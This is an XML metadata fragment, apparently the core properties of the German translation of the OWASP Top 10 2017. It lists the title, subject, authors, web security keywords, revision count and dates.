  <SharedDoc>false</SharedDoc>
  <HyperlinkBase>https://www.owasp.org/index.php/Germany/Projekte/Top_10</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 (Deutsche Version 1.0)</dc:title>
  <dc:subject>Die 10 kritischsten Sicherheitsrisiken für Webanwendungen</dc:subject>
  <dc:creator>Englische Originalversion:;Andrew van der Stock;Neil Smithline;Torsten Gigler;Brian Glas;Deutsche Version:;Christian Dresen;Alexios Fakos;Louisa Frick;Tobias Glemser;Dr. Frank Gut;Dr. Ingo Hanke;Dr. Thomas Herzog;Dr. Markus Koegel;Sebastian Klipper;Jens Liebau;Ralf Reinhardt;Martin Riedel;Michael Schaefer</dc:creator>
  <cp:keywords>Web Application Security, Top 10, XSS, CSRF, SQL Injection</cp:keywords>
  <dc:description>Originialversion: OWASP Top 10 - 2017_x000d_
Thema: The Top 10 Most Critical Web Application Security Risks_x000d_
Autoren: Andrew van der Stock;Neil Smithline;Torsten Gigler;Brian Glas</dc:description>
  <cp:lastModifiedBy>Torsten OWASP</cp:lastModifiedBy>
  <cp:revision>560</cp:revision>
  <cp:lastPrinted>2018-10-26T21:35:27Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2009-08-17T12:51:41Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-11-19T03:38:56Z</dcterms:modified>
  <cp:category>Sicherheit von Webanwendungen</cp:category>
  <cp:contentStatus>RC2_RCC1</cp:contentStatus>
</cp:coreProperties>
</file>